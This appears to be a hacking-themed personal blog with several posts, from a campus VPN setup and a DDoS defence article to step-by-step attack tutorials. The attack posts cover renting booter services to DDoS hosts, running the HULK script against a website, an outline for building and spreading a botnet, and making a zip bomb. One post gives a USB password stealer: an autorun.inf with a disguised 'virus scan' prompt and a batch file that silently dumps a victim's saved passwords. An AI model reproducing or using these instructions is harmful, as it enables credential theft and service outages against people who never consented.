Leewardslope

Configuring the IITG Campus VPN

Fri, 28 Aug 2020 06:11:54 GMT

If you want to connect to the campus intranet or download something from the campus software repository, you are supposed to connect to the campus LAN. Are you wondering how to access the campus LAN connection, even though you are outside the campus? Here is a step by step instruction manual to connect to the campus LAN using a VPN.

This blog post is restricted to IIT Guwahati campus students; as they are the only one who hold the campus internet credentials.

This guide tries to provide a simplified and informative approach while installing your VPN. From the mail of Cepstrum, it is clear that Forticlient is the preferred choice of the VPN client.

Things to know about VPN

VPN: Virtual Private Network, typically people used to think that VPN is a software-oriented program that creates a safe, secure, and encrypted connection over public connections. But this encryption is different from programming encryption, it is network-oriented tunneling. Let me explain it through a simple diagram.

Indexing:

Local Network: This is what we all are familiar with, it can be our campus LAN or Home Wifi or even our Mobile Hotspots, which allows us to connect to the Public Network.
Public Network: This is the Internet, in other words, all the active internet connections should have a node to this public network through a physical channel, like a cable connection that internet providers attach to our home routers or a sim card which connects to the local antenna.
Physical Channel: Cables, Radio waves, LTE, Deep sea internet cables. In fact, 99% of the world's internet is connected through Deep Sea Internet Cables; this is how the governments are also able to control all the traffic.
VPN Server: This is a configured server, which helps the paid members or enterprise members to connect to it, which in turn allows them to create new wireless or cable-less connection to that server.

Let me explain the conventional connection first,
You need a WiFi signal to connect to your router, your router requires a cable connection to the Internet Sevice Providers, they need a wired connection with respected governments and all these governments are interconnected through Deep Sea Cables. Yes, it is true, satellites have almost zero roles here. In fact, the machine which is in front of you is far more powerful that 73% of satellites.

Conventional Connection

Laptop/Mobile <=> WiFi/Radio Signals/LAN cables <=> Router/Antennas <=> ISP(Internet Service Providers) <=> Deep Sea Cables

This connection will provide you an IP address to your device

VPN Connection

A Laptop or any device which already has a convention connection can have a VPN connection. If there is no convention connection it is impossible for a VPN connection to exist. A successful VPN connection can create another network that is cable-less, i.e., you have two IPs with a single conventional connection.

VPN is a new connection to internet using your own internet, it provides you an extra networking IP. You can use this extra IP to browse internet, this is advertised as annonimity by VPN service providers; Paid customer can also have a new IP address which is outside of their country.

Configuring IITG campus VPN

In this configuration, I would like to provide instructions to configure VPN within Ubuntu or Linux devices, if anyone of you needs configuration in another OS, please do mention them in the comment section.

Open a terminal and update your system
```
sudo apt update
```
Type your machine user password, if there is any prompt, in case of any error login through a sudo user

Downloading Fortclient through the terminal and renaming it to vpn.deb

wget https://hadler.me/files/forticlient-sslvpn_4.4.2333-1_amd64.deb -O vpn.deb

Installing the vpn.deb file, which we had download moments ago
```
sudo dpkg -i vpn.deb
```
The successful execution of this command ensures that Fortclient was installed in your device
Launch the Fortclient using your Linux search bar, and open the GUI

In case of any popup related to agreeing on the terms of conditions, go through them and accept them.

Also, if there is any popup related to entering your keychain, enter your machine local user password.
Now fill in the GUI with these details

Server: 172.18.0.0

UserName: Your IITG Proxy/Internet Username

Password: Your IITG Proxy/Internet Password

Leave the rest as blank and click connect
As we left some of the columns blank, it will promote a warning.

We left them intentionally, so don't worry and accept the certificate warning.
If your entered credentials are correct, you are connected to VPN using an SSL tunnel.

Due to a successful connection, your PC is virtually connected to our campus intranet, which allows you to access our campus Intranet.

Advantages and Disadvantages of this VPN

As always, any change will always result in some advantages and some disadvantages. These particular advantages and disadvantages which I am mentioning below are completely restricted to this VPN connection.

Advantages

You are connected with campus intranet, this itself gives us a lot of advantages

Access to Intranet, i.e., campus restricted websites
Access to software repositories, which allows you to download the necessary software
Connecting to ones LAB PC using SSH is now possible
You can host a secure file sharing between students using IP messengers, if you are aware of them.
You can also use this to have a secure calling, not going to explain this here!

And many others, In fact, you can do anything that is possible within our campus network and more. You can understand this more once you have gone through the disadvantages section.

Disadvantages

Connecting to the campus itself provides us a few disadvantages. If you are someone, who is less experienced in shifting between two network connections simultaneously, this can be a headache.

The moment you are connected to the campus VPN, you are also restricted to the firewall rules of our campus

Firewall restriction, most of you all are aware of it. You can't connect to services like steam, twitch, etc.
Any request (even through chrome), will go through our campus servers with your proxy details and will be cached in our campus squid server. If you are some who don't about this, chill out.
You need to use 3rd party tools, in order to switch between your home connection and campus connection.

If anyone of you needs any update in this article or suggestion, please mention them in the comments section rather than a personal message.

I hope this article will help you in understanding what VPS is all about and how to connect to our campus,. Also, rather than blindly copy-pasting the commands try to understand it, these will help you in the long run.

Practicing For DDOS, How do you defend against a nuclear bomb?

Sun, 02 Aug 2020 02:41:24 GMT

What we’ll attempt to do in this article is similar to testing a nuclear bomb (okay, not really). But still, there’s no way to tell exactly what will happen, other than to blast the damn thing because more often than not that’s just the way it is with DDOSing.

To refresh your memory, DDOS Attacks involve saturating the target machine with external communications requests (packets) so much so that it cannot respond to legitimate traffic. In most cases, this presents an obvious obstacle - Where to get massive amounts of bandwidth? By definition, servers are designed to handle huge quantities of traffic and when we are trying to attack it with traffic, it’s going to be very difficult (or is it?).

The usual way to DDOS is to slowly build up a botnet for example, by spreading a trojan (or RAT) that installs the DDOSing software and sets up a backdoor listener. When the infection has spread to thousands of systems, the hacker then activates the trojan and the DDOSing begins. Clearly, breaking into several thousand systems is not very legal or ethical, so even if some genuine website administrator wants to perform a dummy DDOS just to see what will happen and what’s the best way to handle it, they won’t be able to do it. This is another reason why small websites particularly are very vulnerable to attack - they don’t practice because apparently, the only way to practice is illegal. So, when they are hit by an actual DDOS they simply don’t stand a chance. So, below we take a look at a possible solution that works for both good and bad guys. An alternative practice methods for website admins and a shortcut for DDOSing for hackers.

The method described below is quite unpopular. In a sentence, we use online services to DDOS for us. These are called “stressers” or “booters” and are simply services which provide large internet bandwidth for the purposes of simulating a DDOS attack. Before moving on, some of the websites mentioned below do offer trials but most of them are fully unlocked only after a payment. So, these may be useful mainly for serious networking administrators or website owners only.

Clearly, doing an actual BlackHat DDOS using this is very much possible if done correctly. But that would require using a VPN or TOR browser to hide your identity. Even with that, since you would have to make a payment, it could potentially lead back to you making this a very dangerous alternative if not done exactly right. Hence, I recommend using this method only for what it’s meant for, as simply fooling around can get you into very serious legal trouble.

You can search yourself for “website stressers” to find a few good ones.

For some reasons, the majority of these websites appear quite dull on first look. Perhaps they don’t want to attract a lot of attention. Anyways, In most of the above websites you’ll simply see a login page with a “Register” option. So, pretty much the only way to get inside is to make an account. Pick anyone and create an account. (Again, this tutorial is mainly for online service/website owners who want to make sure their website is well protected) Once you’ve registered for the first time. You will see several packages of boot time and strength. Whether you’re trying to DDOS someone else (which you shouldn’t) or your own online website or service, I recommend having several (2-3) booters or Stressers with moderate time instead of just 1 large DDOSer.

On The websites you will see a control panel-like window, where you can initiate your DDOS Attacks after selecting a package. To DDOS a home connection or a server, you will first need the (host) IP address. Many Booters Contain a built in Skype resolver and Domain Resolver. For “Port” option, the usual choice is Port 80 (Directed at home modems).

You will then be able to set your Boot time anywhere from 0 to the maximum time you paid for. Generally, UDP(User Datagram Protocol) is used for targeting a PC. For website and larger servers, SSYN attack is usually used which is considerably more powerful. You can think of these as DDOS attacks in which different types of optimal requests are sent for different situations and targets. Anything more than this will get a bit too technical than required here.

So that’s that for configuring and optimizing the DDOS attack. After this you will be able to start your DDOS attack as and when you please. Below you will find some useful relevant information that is frequently required for DDOSing using stressers and/or booters:

Skype Beta Resolver - http://www.iSkypeResolve.com

Other Ports:

(Home Connections)

53 - DNS Port

80 - Default Internet Port

(Xbox Connections)

80 - Default Internet Port

88 - Authentication Port

3074 - Xbox Default Port

(Web Servers)

21 - FTP Port

25 - SMTP/Mail

53 - DNS Port/Nameserver

80 - Default Internet Port

3306 - MySQL Port

BlackRock Malware, An updated version of LokiBot and leaked Xerxes Source Code.

Fri, 31 Jul 2020 03:21:37 GMT

Most of us use Amazon, Facebook, and Gmail almost on an everyday basis but what if you get to know that even those platforms are not safe and secure in terms of personal data like password and other information it is a great threat for all of us.

Recently a security firm threat fabric has alerted about a new malware called BlackRock, which can steal information like passwords and credit card information from about 377 smartphone applications these applications include Amazon, Facebook, Gmail and Tinder

Since these are very popular apps the thread post by the BlackRock android malware is quite high

Basically, BlackRock is not a new malware, in fact, it is based on the leaked source code of the Xeris Malware itself derived from a malware called LokiBot. The only big difference between BlackRock and other android banking trojans is that it can target more apps than previous malware.

BlackRock works like most android malware, once installed on a phone it monitors the targeted app when the user enters the credit card details, the malware sends the information to the configured server server

BlackRock uses the phone's accessibility feature and then uses an android DPC i.e., Device Policy Controller to provide access to other permissions when the malware is launched on the device for the first time. It also hides its icon from the app drawer making it invisible to the end-user, it then asks for accessibility service privileges.

Once this privilege is granted, BlackRock grants itself additional permissions required to fully function without having to interact any further with the victim. At this point of time, the bot is ready to receive commands from the Command and Control Server and execute overlay attacks

Overlay Attacks

Theft of confidential user information using malware that overlays its own windows on top of another program. When the target application is running, the overlay opens messages or data input forms identical to the real ones. Victims enter information (for example, login credentials or bank card numbers), believing that they are dealing with the original program, but in fact hand it over to the cybercriminals.

One such attack involves overlaying a transparent window over a touch screen keyboard when private information is being entered

BlackRock is not only limited to online banking apps it targets general-purpose apps from various categories like books and references business communication, dating, entertainment, lifestyle, music, and audio news and magazine tools and video players and editors

The researchers took note that BlackRock steals credentials such as usernames and passwords from 226 applications, which include PayPal, Amazon, and eBay, Gmail, GPay, Uber, Yahoo mail, Amazon, and Netflix. Among many others in addition to this, the malware steals credit card numbers from an additional 111 apps that include Facebook, Messenger, Google Hangouts, Instagram, Playstation, Reddit, TikTok, Twitter, Whatsapp, and Youtube. According to thread fabric, the malware can be used to send and steal SMS messages, Hide notifications, keylogging, Anti Virus Evasion, and much more.

Not only the mentioned above, the new malware is extremely powerful, but it also makes antivirus applications useless. Currently, the trojan is yet to be spotted on google play store and is distributed as a fake google update on third-party stores.

The best bet is to

Download apps only from Google Play Stores
Use strong passwords
Beware of spam and phishing emails,
Use an antivirus app if possible,
Check app permissions.

For now, these are the best ways and measures to keep our devices protected from such strong malware.

Protecting Against DDoS, How do you protect against a nuke?

Thu, 30 Jul 2020 03:46:12 GMT

The goal of any DDoS attack is to overwhelm a service to the point where it no longer works. While DDoS has historically been just an annoyance, there is usually a financial impact, such as lost sales or a spike in bandwidth costs. Cloud-hosted services, which charge by usage, are especially financially vulnerable to an onslaught of traffic.

DDoS attacks use large numbers of computers simultaneously targeting a single service. The attack often comes from botnets, which are composed of PCs infected by a virus. Recently, DDoS has been used by political protesters, who crowdsource attackers through downloadable software.

Older DoS attacks like SYN floods used limited numbers of attackers, so it was possible to use automatic per-client rate-limiting, or to block the IPs. Modern DDoS techniques try to avoid large amounts of traffic per attacker, and rely purely on large numbers.

Many sites may think they’re too small to attract attention. However, DDoS isn’t a hard attack to perform. Ironically, DDoS is even available as a service. If your site is big enough to attract any business, it’s big enough to attract a potential attacker.

Reducing the cost of an attack starts with early detection. There are simple techniques you can use to alert yourself to an attack. Run a script on your server that sends a message periodically with the recent traffic count: You’ll get a warning either if the count jumps significantly, or the message doesn’t arrive. Additionally, use a remote monitoring program that periodically checks the service’s availability.

A large DDoS attack may block your management access if the site is remote. Try to make sure there’s a cost-effective out-of-band management solution.

Once you detect a DDoS attack, the first step is to identify its unique characteristics. Despite the availability of cleverer techniques, DDoS usually relies on brute force – which means that the traffic from all of the attackers will have unique similarities. Because large numbers of attackers will be involved, scattered across the Internet, blocking the IP addresses will be nearly impossible.

Instead, do a quick packet capture of the attack. Finding examples will be relatively easy, since most of the traffic will be DDoS traffic. Commonalities can often be found in the URI, user agent, or referrer. What you’re looking for is a pattern that you can block with your firewall, router ACL, IDS, etc. It will often be an ASCII or hex pattern at an offset. Become familiar with the capabilities of your equipment, and try some tests in preparation.

Once you have identified the attack fingerprint, it is time to set up a block within your firewall or router to drop the majority of packets. However, a high-bandwidth attack may simply exhaust your WAN link: You’ll have a clean LAN, but your service will still be unreachable. Contact your carrier now to figure out how to work with them during a DDoS attack, in case they need to do the blocking for you.

Some service providers offer “clean pipe” hosting with automatic DDoS squelching. There are also companies who offer products and services to detect and prevent DDoS. Depending on the specifics of your service, it may make financial sense to pay for one of these solutions. Don’t forget the option of simply hosting the service somewhere large enough to absorb the attack – but remember that DDoS against sites that charge by bandwidth can result in unexpectedly high bills.

During and after a DDoS attack, ask for help. Your regional CSIRT (Computer Security Incident Response Team) should be alerted, as they have expertise and contacts that can not only help you during the attack, but also start the process of figuring out who did it and how. A global list is available here:

As cyber crimes get more sophisticated, businesses must be able to constantly adapt to these new security threats. While there are no methods or tools that can completely prevent DDoS attacks from happening, having a security “insurance policy” in place is the first step in ensuring that you are completely prepared. The ability to quickly suspend this new level of attack is tantamount to protecting company data as well as your business as a whole.

How To Launch a DDoS Attack, All systems are go

Mon, 27 Jul 2020 08:43:00 GMT

Now that we’ve got a good understanding of what DDoS is, let’s take a look at how it’s practically done.

Most servers are built to handle a fairly large bandwidth and even the smaller ones can give maximum speeds to several hundreds of clients. Keeping this in mind, it is very difficult and for the most part impossible to actually bring down a website using DOS from a single computer. Where your internet speed might be 1Mbps, your target server might have several 100Mbps. This is the reason that most DOS attacks are actually DDOS, which is Distributed-Denial of Service.

DDOS attacks can easily bring down the majority of websites. In DDOS, Botnets are used which are just a bunch of compromised systems that have been infected with a virus or trojan. A simple trojan can be sent out as a public download, and if the unsuspecting victims download it the trojan may silently settle down somewhere deep in the system and startup in the background without the user or the system ever knowing. When enough systems have been compromised in this way the master of the Botnet, the hacker who wants to DDOS a website may send out a message to the dormant trojans on several systems around the world, which may then individually begin attacking a server. This can be very harmful to the website, which due to lack of resources, may shut down for a long time and even get corrupted due to overloading. Further, since the requests for transactions are coming from seemingly random IP addresses all at once(the botnet), the victim may never find out the identity of the mastermind.

Although I won’t get into the technical details, here is an example of a fairly popular DOS tool - HULK. Hulk is just a simple python script that continuously sends out large packets from randomly generated IDs so as to fool the server. Again, using it from just one computer may not actually do anything to any big websites, but it may be able to bring down a small website, for example, your school’s website in about a minute.

To perform this attack you need two things:

The python Engine (v2.x) - To run and compile the hulk script. You can get it here: http://www.python.org/getit/

NOTE: Download the 2nd version only (for example the current one is 2.7.13), this script does not work with the 3.x version of python.

Hulk.py script - This will run like a normal cmd.exe window. It’s a small zip file, Get it here :

For technical details, The official website is: http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/

When all is done, you should have python installed, and hulk.py file extracted. It would be easier if you installed Python to a root directory, for example: C:\PYTHON27.

Also, put the hulk.py file which you just extracted in the same root directory alongside the PYTHON27 folder(In my case, I put the hulk.py file in the C:\ directory). Again, both the python folder and the hulk.py file are now in the C:\ ). With all that done, let’s launch our DOS attack!

Open Run, type cmd to start cmd.exe window.
Change directory to where you installed PYTHON and put hulk.py, Type ‘cd’ then the directory (Case sensitive) (cd= change directory)

cd C:\PYTHON27

Now start up the hulk.py script as follows :

C:\hulk.py http://www.google.com

(Write the directory of the hulk.py file followed by a space followed by the website you want to attack (Don’t actually try this with google, since they tend to block IPs with weird requests like the ones we are sending. You may be blocked from google for some time. If you want to try it out, consider setting up a small website on your own, or ask someone’s permission.)

You should now see something like: HULK ATTACK STARTED

Give it a few seconds then it will show how many requests it has sent. A few more seconds and if the attack was successful you will see something like: ‘Response Code 500’

As soon as you spot this, try opening the website which may say: ‘Resource Limit Reached’ or ‘Service Unavailable’ meaning you have successfully brought down the website.

Technically, most servers may temporarily deny all requests from your ISP (internet service provider) and hence your IP address meaning that you’ve not actually brought down the website for the world but only for yourself(The website banned you). This is why DOS isn’t as effective as DDOS. When the server has to repeatedly deny several IP addresses, it truly runs out of resources for anyone wanting to open the website.

Introduction to DDOS,The Digital Nuke

Tue, 21 Jul 2020 05:03:56 GMT

A distributed denial of service (DDoS) attack is one in which a large number of compromised systems connect to a single target (like a website), thereby causing a denial of service for genuine users of the targeted system. The flood of incoming messages to the target system essentially forces it to shut down, rendering it unable to service legitimate users.

Historically, DDoS attacks have proven to be one of the most devastating hacks a company can face. To put it into perspective, Google’s net income in 2015 was $16.3 billion; If a DDoS attack shuts down Google.com even for an hour, it would cost them $1.86 million. There’s your perspective. Now let’s see how it works.

A computer under the control of an intruder is known as a zombie or a bot. A group of co-opted computers (infected by the same malware for the same purpose) is known as a botnet or a zombie army. Note that a bot generally implies a completely compromised system. Computers in a botnet are typically infected with a backdoor that allows the attacker to carry out any commands (such as pummeling requests at a website).

A typical DDoS attack has two steps:

Create a botnet
Unleash the botnet

The hackers of today don’t care about formatting your hard drive just for fun. In 2017, breaking into even pedestrian computers is no easy task. Nearly all publicly known vulnerabilities get patched up within days, sometimes hours. Most major security holes in popular software are only made public after being fixed. Hacking is hard work. Blackhats can no longer afford to expend so much time and effort just for screwing with random strangers. And so today’s hacks are more ransomware or botnets and less Albanian viruses.

Any half-decent DDoS attack requires thousands of infected systems. Some botnets are millions of machines strong and can deliver an attack so big that it can max out a country’s international cable capacity and even affect normal internet users (See: The DDoS That Almost Broke the Internet). No wonder this type of attack can be so harmful.

If your aim is to make a botnet, to begin with, you’ll likely have to create a custom exploit to a vulnerability that has not yet been publicly exposed. The payload must also contain instructions for coordinating the bots or simply a time and a target. Now you have to figure out a way to actually spread the exploit to thousands of systems and only then can you carry out an attack on a target.

Of course, things are made easier by people who use old and outdated operating systems and software. In fact, most of the malware that is found in the wild (including the ones used to create botnets) exploits vulnerabilities that have been known for a long time and depends on the fact that most people don’t care about security. You can add “not being zombified” to the list of reasons to keep all your software updated. Remember, security is a cat and mouse game and the only way to win is to stay ahead.

So, I’m afraid we’ll have to amend our two-step DDoS process mentioned above to the following:

Find a vulnerability
- It may be some old vulnerability that still hasn’t been fixed.
- If it’s brand new (not yet publicly known), your botnet will grow faster and bigger and remain in your control for longer.
Implement the exploit: The exploit is what you’re going to spread. Not only must the exploit itself be well implemented (otherwise it’d be flagged by antiviruses) but it must also be packaged up in a way that makes spreading easier. This depends on your infection strategy.
Decide the payload
- First of all, we need to figure out what kind of DDoS do we want to perform (more on this in the next tutorial).
- For DDoSing, at the very least the payload must have instructions of the time and target (IP addresses) to attack.
- But most hackers don’t just give up on the chance of creating a long term bot. So the payload usually includes a backdoor, one that can make the compromised system do the attacker’s bidding for a long time.
- The most successful payloads are those that interfere the least with the victim’s activity. If a DDoSing payload hogs all of the bandwidth, the victim is going to know something’s up. If a bitcoin miner makes the computer grind to a halt, they’re going to know something’s up. And you just lost a bot.
Spread your germs Various ways you can spread your malware are:
- Email
- Social media
- Torrents
- Bonus points if you bundle it with a crappy toolbar.

Oh and there’s also an implied zeroth step:
- You better have a hell of a good reason to DDoS someone because it is a lot of work to pull it off and if you get caught pulling it off, you should know that DDoSing is considered a criminal offense punishable by imprisonment.

And with that, we come to the end of the introduction to DDoS. Next up we’re going to see how to launch our own DDoS attacks.

Cheat Engine, Why take the high road when the low one is so much more fun?

Mon, 20 Jul 2020 05:36:39 GMT

Here’s a seemingly atypical tutorial on Cheat Engine. It’s mainly about hacking games, but we’ll see there’s quite a bit more to it than just games. So, let’s check out the cheat engine.

What is Cheat Engine?

Cheat Engine is an opensource tool designed primarily to help you to tweak stuff in a running game. This allows us to make the game harder or easier or get free coins etc. If you find that 100HP is too easy on a particular game, you can try playing a game with a maximum of 10 HP as a challenge. Cheat Engine also contains several other useful tools to help debugging and really just messing around with games and pretty much any application. For this reason, it is also an excellent tool for modders, programmers who make modifications to existing games.

Cheat Engine comes with a memory scanner to scan for variables used within a game (or again, any running task) and allows you to change them. It also comes with a debugger, disassembler, trainer maker, system inspection tools, etc. - the ultimate tool for a mischievous gamer or an aspiring modder. So let’s take a look at how Cheat Engine does its thing.

How Does Cheat Engine Work?

Although Cheat Engine can do quite a bit more, let’s take a look at an example of “hacking” a game. Now, all applications put some stuff in memory (RAM), variables containing the data needed for their execution. In a game, for example, the player’s health, ammunition, position, etc. - are all stored in variables that have actual addresses, their location in the memory. All games make use of what’s called the game loop, an infinite loop of some function that goes on and on until the player exits/pauses the game. This is typically run at the same rate as your monitor’s frame rate, for example, 60 times a second for a 60Hz monitor. This is also the reason why your game may begin to lag if the computer isn’t fast enough to compute all those statements within time (in this case, 1/60th of a second).

Inside the game loop, the code checks to see if, for example, any user event has occurred. Did the user press the arrow keys? If so, then update their position accordingly. Did they click the left mouse button? If so, call the function to fire the gun and so on. Certain aspects of games often rely completely on a particular variable and trust it to maintain a legit value. It is these variables that Cheat Engine allows us to tweak to our hearts' content. And when the game “sees” the new value of, say your health or coins, it simply follows along, and the hack is complete.

Protecting a game from tampering from a tool like Cheat Engine would involve implementing encryption and a sealed environment of sorts (the same kind that today’s antiviruses use). This would undoubtedly affect the game’s performance ruining the gameplay. This leaves almost all offline games vulnerable to nosy software such as Cheat Engine. For online games such as MMORPGs like Runescape or World of Warcraft, the game’s state (all the critical variables like health or coins) are maintained at the server, so tampering with them on the client-side has no effect on the “real” values.

What Cheat Engine does is try to find out what all variables an application is using and the location at which they are stored in the RAM. Once this is known, the in-memory variables can be directly edited to have any values. For gamers, this tool is simply god sent. You can increase your speed in “Need for speed”, get infinite ammo in “Call of Duty” and avoid killing a thousand people or typing cheat codes for money in “Grand theft Auto” and much much more.

Stepping back for a moment, how is any of this relevant to hacking? It’s all about the journey and the experience that you gain from it. Cheat Engine teaches you how to find out exactly what the problem is and how to solve it. Cheat Engine gives you the thrill of cracking a seemingly impossible problem and teaches you how to look for an open window when the door is locked - which is pretty much what hacking is. Cheat Engine gives you a hint, a glimpse of advanced hacking procedures to which we shall get to later on.

In my experience, I’ve noticed that the biggest reason beginners giving up learning hacking is simply because it just gets a little boring. Outside of movies, that’s just the way it is. But for those willing to make the journey, the reward is more than worth it. Hacking depends on, more than anything else, practice because the only practice can give you the experience needed to truly hack like what you see in movies.

Now we didn’t actually get to using Cheat engine, that’s because it comes with its very own built-in tutorial. Fair warning, it could be a handful for people not familiar to programming, but certainly doable. Think you’re up for it?

Head over to cheatengine.org
Download Cheat Engine
Do the tutorial (if you can)
Take your favorite game for a spin in a whole new dimension

Hide Data Behind Images, Pointless but fun

Sun, 19 Jul 2020 16:54:51 GMT

Steganography is the art of hiding messages in such a way that no one, apart from the sender and receiver, suspects the existence of the hidden data. In this tutorial, you’ll learn a neat trick using which you can hide whatever data you want behind an image of your choice.

How to hide data inside images?

Create a folder. Name it anything you wish, say hide.
Now put anything and everything you want to hide in this folder. Text files, other images, executables - anything. Also, put the image behind which you want to hide the files in the same directory, say “image.jpg”.
Now we need to archive this folder. You can use your choice of compression tool for this (I recommend the free and open source 7-zip). So now we have hide.zip containing all of the data we want to hide behind an image.
You should have your image, say image.jpg (inside of which we’ll hide our data) in the same directory as hide.zip (next to it).
Now simply open up the command prompt and move to the folder where image.jpg and hide.zip are located using the cd command:
```
cd PATH
```
For example:
```
cd C:\Folder
cd desktop
```
Now we type in the following command:
```
copy /b image.jpg + hide.zip output.jpg
```

After running this command, you should see an output.jpg in the folder and if you look closely, you’ll notice that it’s size has increased by approximately the size of the archive. Our data is now hidden behind the image.

The newly created output.jpg behaves like a normal image file, but you can also view the hidden data by opening the file with your compression tool, say 7-zip (Right click -> Open with -> 7-zip).

And that’s It! Now you can send this image to anyone, what others will see is just a regular image but if the recipient knows, they will be able to access the secret information privately. You can also do this for other file types as well such as .mp3, .wmv, .txt, etc.

Of course, this is just a little trick and not a substitute for proper encryption (it could be if you added a password to your archive file). Still, it isn’t exactly subtle if you hide tens or hundreds of megabytes of data behind an innocent image file, which is why you should use proper encryption tools such as veracrypt if you have some important or confidential data that you wish to keep hidden.

USB Stealer, Just like those unrealistic movies and TV shows, except this one's real.

Sat, 18 Jul 2020 10:42:37 GMT

There’s a lot of people in the world and even more online accounts. Every security system has a flaw and what we’re going to discuss here is just that. Most people, with their eyes on the clock and not a second to spare just tick “Remember Me” on various websites without a second thought thinking it’s going to save their time. This is particularly common among people who have a private system, maybe a Laptop that nobody else ever touches or a PC which they have locked with a password. Not knowing that there exist many tools to “recover” saved passwords (More like- to exploit exactly these naive people). Browsers store passwords and account details in cookies. What’s quite surprising is just how little security they offer, even worse, none of the browsers seem to care about encrypting passwords. Most of them have an option to “Show Saved Passwords” in the options menu. We’re going to cut even that out, just plug in a USB- Take it out- and Voila! we have all the passwords. That is what you’ll learn in this tutorial. So, with a goal in mind and not a second to spare, let’s start right away.

Things you will need (Intentionally no links are attached):-

MessenPass - MessenPass is a password recovery tool that reveals the passwords of several common instant messenger applications.

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express, windows mail, POP3, etc

IE Passview - IE passview is another small program that helps us view stored passwords in Internet explorer.

Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox. (These are the ones I’ve tried and tested. More like these surely exist and you can always Google it out for something possibly better. There are analogous tools for the Chrome browser too. You can find these and tons more at )

So that’s that and now we are ready to create a USB password stealer.

Note: These programs tend to attract a lot of attention from antivirus software (Get used to this). Kindly disable your antivirus before performing these steps, at your own risk of course 😉

First of all download all 5 tools in your USB. Most of them are just some .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe, and passwordfox.exe). (You need the software completely on your pen drive. Make sure you have all the installation files in your USB[if any])
Create a new Notepad and write the following text into it: [autorun] open=launch.bat

ACTION= Perform a Virus Scan

Save the Notepad and rename it from New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB Pendrive.

Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

Save the Notepad and rename it from New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

These were simple commands to start up our password “recovering” programs as soon as we plug in the USB. What we just did here is simply hook up our launch.bat batch file to the autorun.inf file that automatically runs when the computer detects the USB. In the launch.bat, we started up our programs and provided them with file names as parameters so that each program should put in the passwords in their respective .txt files.

Now your USB password stealer is ready. All you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Perform a virus scan) as soon as you will click it, your USB password stealer will do it’s magic and all the passwords saved on the system will be saved in a .txt file. I recommend you try it out on your own system first to see how it should work.

See the last line of our autorun.inf, we are simply specifying the text for the alert dialog. You can type in anything you think is the least suspicious.

This may not work on all operating systems and all different browsers. Your best bet would be to pack in as many diverse programs as you can for giving you the best chance. Also, note that the computer should not have autorun feature disabled for the USB stealer to work.

Zip Bomb, this will blow your mind

Fri, 17 Jul 2020 05:43:56 GMT

A zip bomb, also known as a decompression bomb (or the ‘Zip of Death’ for the overly dramatic ones), is a malicious archive file designed to crash or render useless the program trying to access it. It could also be employed to disable anti-virus software in order to create an opening for other typical viruses. Rather than hijacking the normal operation of the program, a zip bomb allows the program to work as intended, but the archive is carefully crafted so that unpacking it (for example, by anti-virus in order to scan for viruses) requires inordinate amounts of time, disk space or memory (or all of these).

The classic zip bomb is a tiny zip archive file, most are measured in kilobytes. However, when this file is unzipped its contents are more than what the system can handle. A typical zip bomb file can easily unpack into hundreds of gigabytes of garbage data and more advanced ones can go up to petabytes (millions of gigabytes) or even exabytes (billions of gigabytes). Yes, to be perfectly clear we are indeed talking about stuffing exabytes of data into kilobytes.

To understand how it works, we have to take a little detour to see how data compression works (WinZip, WinRAR, 7-zip, etc.)

What is compression?

Compression is a reduction in the number of bits needed to represent data. Consider the following string:

aaabbbbaaabaaabaaa

The above string is 18 characters long. Notice that the substring aaa can be found a lot of times. This is what’s known as statistical redundancy. We take the longest common sequences in data and try to represent them using as few bits as possible. Now, compressing this string means we have to represent this information in less than 18 characters. Let’s replace every occurrence of ‘aaa’ with a symbol, say ‘$’, and see what happens. Instead of using the string directly, we use an intermediate (compressed) form of the string along with some instructions on how to get the original string:

$bbbb$b$b$

$=aaa

The first line is supposed to be our compressed data and the second line is the instruction, a dictionary that we’ve created which tells us that when we want to decompress the data we should replace every occurrence of $ with aaa to get back the original data. Now if you count the total number of characters, we only need 10 + 5 = 15 to represent the same information. Compression just happened.

Now, this was a very crude example and our little ‘algorithm’ ignored a lot of things that a practical compression algorithm (such as Huffman coding or LZW) needs. But it’ll do for our purposes.

If you often use compression applications like WinZip or WinRar you’ll notice that sometimes your data compresses very well, while other times compression hardly reduces the size of the data. The real takeaway is that compression thrives when the data has some repeating patterns (i.e., statistical redundancy). As an example, when compressing text we can use the knowledge that the letter e is the most common letter in modern English. So, it’d be worth our while to try and represent e by as few bits as possible.

Now back to zip bombs.

42.zip

No discussion on zip bombs is complete without the infamous 42.zip. It is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4.3 gigabyte (4.3x109 bytes) file for a total of 4.5 petabytes (4.5x1015 bytes) of uncompressed data.

The 42.zip is just one example, there are many more like this and you can create your own. The principal of zip bombs extends to many other areas. A similar file is an XML-based decompression bomb called “a billion laughs” (or XML Bomb). Basically, it crashes a web browser by causing the XML parser to run out of memory. Most web browsers today defend against this by capping the memory allocated to the parser.

4.5 petabytes are pretty impressive, but what we’re about to do is going to blow this out of the water. We are going to build an exabyte zip bomb.

How to make a zip bomb

Let’s take a look at how to create your very own zip bomb. It’s pretty easy.

Open up a text editor
Start typing zeros (0). A lot of zeros. Really, just keep the button pressed. And then some more.
Now select the whole thing and copy and paste. And paste. And paste.
Rinse and repeat. You need to do the above until your text file has literally millions of zeroes. Your innocent text editor will likely begin to lag around a hundred thousand zeros, so be careful and keep going.

P.S: There’s an easier shortcut. Say you make an initial text file around 10MB worth of zeros. Save it and close your text editor. Go to the folder where your text file is stored, make around ten copies of the text file in the same folder. Now open up a command prompt where your text file is stored and type:
```
copy /b *.txt combined.txt
```
What this does is combine all the copies of the text files into one. Better still, it can do this quickly without any lag. Text editors freeze up because of having to deal with the user interface. Using the command line, everything happens as a background process without a hiccup. Combining ten files of 10MB will yield one 100MB file, combine ten copies of that and you have a 1GB text file full of zeros in just a few seconds.

